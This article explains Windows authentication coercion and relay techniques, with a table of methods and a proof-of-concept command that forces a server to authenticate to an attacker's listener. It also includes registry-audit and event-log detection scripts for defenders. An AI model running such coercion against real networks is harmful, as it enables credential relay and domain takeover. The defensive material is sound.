Windows Authentication Coercion Attacks Present Major Risks to Enterprise Networks

Authentication coercion remains a potent attack vector in Windows environments, enabling attackers with even low-privileged domain accounts to force targeted systems, often high-value servers or domain controllers, to authenticate to attacker-controlled hosts.

This technique is closely tied to NTLM and Kerberos relay attacks, where the coerced authentication session is intercepted and relayed to other services, potentially granting administrative access or enabling lateral movement across the network.

The process typically involves leveraging Remote Procedure Call (RPC) interfaces available on Windows systems.

Attackers connect to these interfaces and invoke specific functions that prompt the target to initiate an outbound authentication attempt.

The credentials—often those of the machine account (e.g., DOMAIN\COMPUTER$)—are then captured or relayed.

This is especially valuable because a relayed machine-account session can be used for impersonation: relaying it to LDAP, for example, lets the attacker write msDS-AllowedToActOnBehalfOfOtherIdentity on that computer object (Resource-Based Constrained Delegation, RBCD) and then obtain service tickets to that host as any user through S4U2Self/S4U2Proxy, while relaying a domain controller's account is enough for domain escalation.

Several coercion techniques have emerged, each exploiting different Windows RPC protocols.

The table below summarizes the primary methods, their applicable protocols, and their capabilities in 2025 environments:

Method      Protocol   SMB capable  HTTP capable  DCERPC capable  Available on clients  Available on servers
PrinterBug  MS-RPRN    ⭕*          ⭕*           ✅*
PetitPotam  MS-EFSRPC  ⭕**         ⭕**
DFSCoerce   MS-DFSNM   ✅                                                               ✅
WSPCoerce   MS-WSP     ✅                                          ✅                    ⭕***

✅ supported; ⭕ supported under the condition noted; blank: not stated.
*   SMB/HTTP coercion available before Windows 11 22H2/Server 2025; DCERPC only after
**  Service runs on demand
*** Service can be installed

PetitPotam (MS-EFSRPC):
This attack abuses the Encrypting File System Remote Protocol, which is reachable over several named pipes (lsarpc and efsrpc among them).

By invoking functions such as EfsRpcOpenFileRaw with a UNC path that points at the attacker's host, attackers force the target to connect to a specified SMB or HTTP endpoint, leaking its machine-account authentication.

Tools like Coercer automate the discovery and exploitation of such RPC interfaces.

PrinterBug (MS-RPRN):
Exploits the Print System Remote Protocol: the RpcRemoteFindFirstPrinterChangeNotificationEx call registers a change-notification callback to an attacker-supplied host, and the spooler authenticates to that host to deliver it.

While newer Windows versions limit this to DCERPC, older systems still allow SMB/HTTP coercion, making it a versatile method.

DFSCoerce (MS-DFSNM):
Targets the Distributed File System Namespace Management Protocol (the netdfs pipe; NetrDfsAddStdRoot and NetrDfsRemoveStdRoot), available on servers, to trigger SMB-based authentication attempts.

It remains relevant wherever NTLM is still permitted: the coerced connection goes to an attacker-controlled IP address, for which no Kerberos service ticket can normally be obtained, so the target falls back to NTLM.

WSPCoerce (MS-WSP):
Abuses the Windows Search Protocol, which is enabled by default on workstations but not on servers, to trigger SMB authentication.

Recent research has produced Python implementations for cross-platform exploitation.

Sample Coercion Code (MS-FSRVP):

The same pattern applies to the File Server Remote VSS Protocol (MS-FSRVP, the protocol behind the ShadowCoerce technique). A proof-of-concept invocation, with the listener address given first and the target second:

# Proof-of-concept for coercing authentication via MS-FSRVP
./coerce_poc.py -d "LAB.local" -u "user1" -p "Podalirius123!" 192.168.2.51 192.168.2.1

This command, run as the low-privileged domain user user1, forces the Windows Server at 192.168.2.1 to authenticate to the attacker's SMB listener at 192.168.2.51. What the listener receives is the server's machine-account NTLM authentication; because a computer account's password is long and random, the captured exchange is of little use for cracking, but it can be relayed while the session is live.

Mitigations and the Future Outlook

Microsoft has responded to these threats by enabling mitigations such as SMB and LDAP signing, channel binding, and Extended Protection for Authentication (EPA) by default in newer Windows versions (Server 2025, Windows 11 24H2).

These measures make relay attacks significantly harder by requiring cryptographic validation of sessions and messages.

However, these defaults apply to fresh installations; a system upgraded in place keeps the settings it already had, and many organizations still run older or upgraded builds with less restrictive defaults.
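Since an upgraded host keeps its old settings, the practical first step is to audit the handful of registry values that decide whether it can be relayed to. The script below is an added example, not code from the article or from Microsoft: it compares a host's SMB signing, LDAP signing and channel binding, and NTLM settings against the hardened values that Server 2025 and Windows 11 24H2 ship with. The registry paths and value names are the real ones; the two snapshots at the bottom are constructed stand-ins for an in-place-upgraded domain controller and a hardened one, used when the script is not running on Windows or is given --snapshot.

```python
"""Audit the registry values that decide whether a host can be relayed to.

Added example, not code from the article or from Microsoft. Registry paths and
value names are real; UPGRADED_DC and HARDENED_DC are constructed snapshots.
"""
from __future__ import annotations

import sys
from dataclasses import dataclass

LANMAN_SERVER = r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
LANMAN_CLIENT = r"SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters"
NTDS = r"SYSTEM\CurrentControlSet\Services\NTDS\Parameters"
LSA = r"SYSTEM\CurrentControlSet\Control\Lsa"
MSV1_0 = r"SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0"

# (key under HKLM, value name, minimum hardened value, meaning). Higher is stricter
# for every value here. An absent value means the OS default applies, which on an
# upgraded host is the permissive one, so absence is reported as a finding.
CHECKS = [
    (LANMAN_SERVER, "RequireSecuritySignature", 1, "SMB server requires signing"),
    (LANMAN_CLIENT, "RequireSecuritySignature", 1, "SMB client requires signing"),
    (NTDS, "LDAPServerIntegrity", 2, "LDAP server requires signing (DCs)"),
    (NTDS, "LdapEnforceChannelBinding", 2, "LDAPS channel binding always enforced (DCs)"),
    (LSA, "LmCompatibilityLevel", 5, "NTLMv2 only; LM and NTLMv1 refused"),
    (MSV1_0, "RestrictSendingNTLMTraffic", 2, "outbound NTLM denied"),
]


@dataclass(frozen=True)
class Finding:
    key: str
    name: str
    actual: int | None   # None = value not present, OS default applies
    required: int
    meaning: str


def audit(values: dict[tuple[str, str], int]) -> list[Finding]:
    """Return one Finding per check whose value is missing or below the hardened minimum."""
    findings = []
    for key, name, required, meaning in CHECKS:
        actual = values.get((key, name))
        if actual is None or actual < required:
            findings.append(Finding(key, name, actual, required, meaning))
    return findings


def read_live_registry() -> dict[tuple[str, str], int]:
    """Read the audited values from HKLM on a Windows host; absent values are skipped."""
    import winreg  # Windows-only module, imported here so the snapshots work elsewhere

    values: dict[tuple[str, str], int] = {}
    for key, name, _required, _meaning in CHECKS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as handle:
                data, _kind = winreg.QueryValueEx(handle, name)
            values[(key, name)] = int(data)
        except OSError:
            pass  # key or value not present: the OS default applies
    return values


# Constructed snapshots, not readings from real hosts.
UPGRADED_DC = {
    (LANMAN_SERVER, "RequireSecuritySignature"): 1,  # DCs have required SMB signing for years
    (NTDS, "LDAPServerIntegrity"): 1,                 # "negotiate signing": relayable
    (LSA, "LmCompatibilityLevel"): 3,                 # sends NTLMv2 but still accepts NTLMv1
    # client SMB signing, channel binding and NTLM restriction were never configured
}
HARDENED_DC = {(key, name): required for key, name, required, _meaning in CHECKS}


def report(label: str, values: dict[tuple[str, str], int]) -> str:
    findings = audit(values)
    lines = [f"{label}: {len(findings)} relay-relevant weakness(es)"]
    for f in findings:
        shown = "absent" if f.actual is None else f.actual
        lines.append(f"  HKLM\\{f.key}\\{f.name} = {shown} (need >= {f.required}): {f.meaning}")
    return "\n".join(lines)


if __name__ == "__main__":
    if sys.platform == "win32" and "--snapshot" not in sys.argv:
        print(report("this host", read_live_registry()))
    else:
        print(report("upgraded DC (constructed)", UPGRADED_DC))
        print(report("hardened DC (constructed)", HARDENED_DC))
```

The audit deliberately treats a missing value as a weakness: a value that is not set means the build's default applies, and on an upgraded system that default is whatever the previous version shipped. Extended Protection for HTTP endpoints such as AD CS web enrollment lives in IIS configuration rather than these keys and has to be checked separately.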

Key Mitigation Strategies:

  • Disable NTLM Authentication: Microsoft is deprecating NTLM, and disabling it where possible removes the NTLM relay path. The coercion itself still succeeds; it simply no longer yields a relayable NTLM session, and Kerberos relay remains possible in specific configurations.
  • Enable SMB/LDAP Signing and Channel Binding: Enforce signing and channel binding on all servers, and Extended Protection on HTTP endpoints such as AD CS web enrollment, so that a relayed session fails cryptographic validation.
  • Monitor and Restrict RPC Interfaces: Limit access to vulnerable RPC interfaces, for example with Windows RPC filters (netsh rpc filter) that block binds to the MS-EFSRPC interface where EFS is not needed, and monitor for machine-account network logons arriving from addresses other than the machine's own.
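The monitoring item above is concrete enough to implement. The script below is an added example, not code from the article or from any tool it names: it runs two checks over constructed Security-log events, written as dicts keyed by the real event field names. On the relay target it looks for Event ID 4624 where a machine account (name ending in $) logs on over the network (LogonType 3) with NTLM from an address that is not its own host; on a coerced host it looks for Event ID 5145 where an ordinary user opens one of the IPC$ named pipes behind the coercion protocols discussed above. The host-to-address map and the administrator list are assumptions made for the example.

```python
"""Spot the log trail a coercion-and-relay chain leaves on Windows hosts.

Added example, not code from the article or from any tool it names. Event field
names are the real ones; HOST_ADDRESSES, ADMINS and SAMPLE_EVENTS are constructed.
"""
from __future__ import annotations

# Named pipe -> coercion method. Pipe names are the ones the protocols use;
# lsarpc also carries plenty of legitimate traffic, so it is the noisiest entry.
COERCION_PIPES = {
    "efsrpc": "PetitPotam (MS-EFSRPC)",
    "lsarpc": "PetitPotam (MS-EFSRPC over lsarpc)",
    "spoolss": "PrinterBug (MS-RPRN)",
    "netdfs": "DFSCoerce (MS-DFSNM)",
    "FssagentRpc": "ShadowCoerce (MS-FSRVP)",
    "MsFteWds": "WSPCoerce (MS-WSP)",
}

LOCAL_SOURCES = {"-", "", "127.0.0.1", "::1"}


def relayed_machine_logon(event: dict, host_addresses: dict[str, set[str]]) -> str | None:
    """4624: NTLM network logon by a computer account from an address that is not that computer's."""
    if event.get("EventID") != 4624 or event.get("LogonType") != 3:
        return None
    account = event.get("TargetUserName", "")
    if not account.endswith("$"):
        return None
    # Kerberos relay is out of scope: this rule keys on NTLM, the package coercion normally yields.
    if event.get("AuthenticationPackageName", "").upper() != "NTLM":
        return None
    source = event.get("IpAddress", "")
    expected = host_addresses.get(account.rstrip("$").upper(), set())
    if source in LOCAL_SOURCES or source in expected:
        return None
    return (f"[{event.get('Computer')}] 4624: machine account {account} logged on via NTLM "
            f"from {source}, expected {sorted(expected) or 'unknown'} (possible relayed coercion)")


def coercion_pipe_access(event: dict, admins: set[str]) -> str | None:
    """5145: a non-admin user account opening a coercion pipe on IPC$."""
    if event.get("EventID") != 5145 or not event.get("ShareName", "").upper().endswith("IPC$"):
        return None
    pipe = event.get("RelativeTargetName", "")
    method = COERCION_PIPES.get(pipe)
    if method is None:
        return None
    user = event.get("SubjectUserName", "")
    if user.endswith("$") or user in admins:
        return None
    return (f"[{event.get('Computer')}] 5145: {user} from {event.get('IpAddress')} opened "
            f"IPC$\\{pipe} ({method}) (possible coercion attempt)")


def scan(events: list[dict], host_addresses: dict[str, set[str]], admins: set[str]) -> list[str]:
    """Run both checks over every event and return the alert lines in log order."""
    hits = []
    for event in events:
        for alert in (relayed_machine_logon(event, host_addresses), coercion_pipe_access(event, admins)):
            if alert:
                hits.append(alert)
    return hits


# Constructed sample data: file server FS01 at 10.0.0.20, DC01 at 10.0.0.10, attacker at 10.0.0.99.
HOST_ADDRESSES = {"FS01": {"10.0.0.20"}, "DC01": {"10.0.0.10"}}
ADMINS = {"svc_backup"}
SAMPLE_EVENTS = [
    # Attacker's relay presenting FS01$ to DC01 over NTLM: flagged
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "FS01$", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.99"},
    # FS01 itself talking to the DC: fine
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "FS01$", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.20"},
    # Kerberos machine logon from elsewhere: not this rule's concern
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "FS01$", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.99"},
    # Low-privileged user opening the efsrpc pipe on FS01 from the attacker host: flagged
    {"EventID": 5145, "Computer": "FS01", "SubjectUserName": "jdoe", "IpAddress": "10.0.0.99",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "efsrpc"},
    # Backup service account touching FssagentRpc is its job: allowed
    {"EventID": 5145, "Computer": "FS01", "SubjectUserName": "svc_backup", "IpAddress": "10.0.0.30",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "FssagentRpc"},
    # Ordinary file share access: no pipe involved
    {"EventID": 5145, "Computer": "FS01", "SubjectUserName": "jdoe", "IpAddress": "10.0.0.50",
     "ShareName": r"\\*\Data", "RelativeTargetName": "reports\\q1.xlsx"},
]

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS, HOST_ADDRESSES, ADMINS):
        print(line)
```

The 4624 rule is the higher-fidelity one: a computer account should only ever authenticate from its own addresses, so a machine-account NTLM logon from anywhere else is either a relay or a misconfigured host. The 5145 rule needs the "Detailed File Share" audit subcategory enabled on the monitored host, and its lsarpc entry will need tuning in any real estate.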

As attackers and defenders continue their arms race, understanding the technical details of authentication coercion remains critical for securing Windows environments.

While new mitigations raise the bar, legacy systems and incomplete configurations ensure that coercion techniques will remain relevant for the foreseeable future.
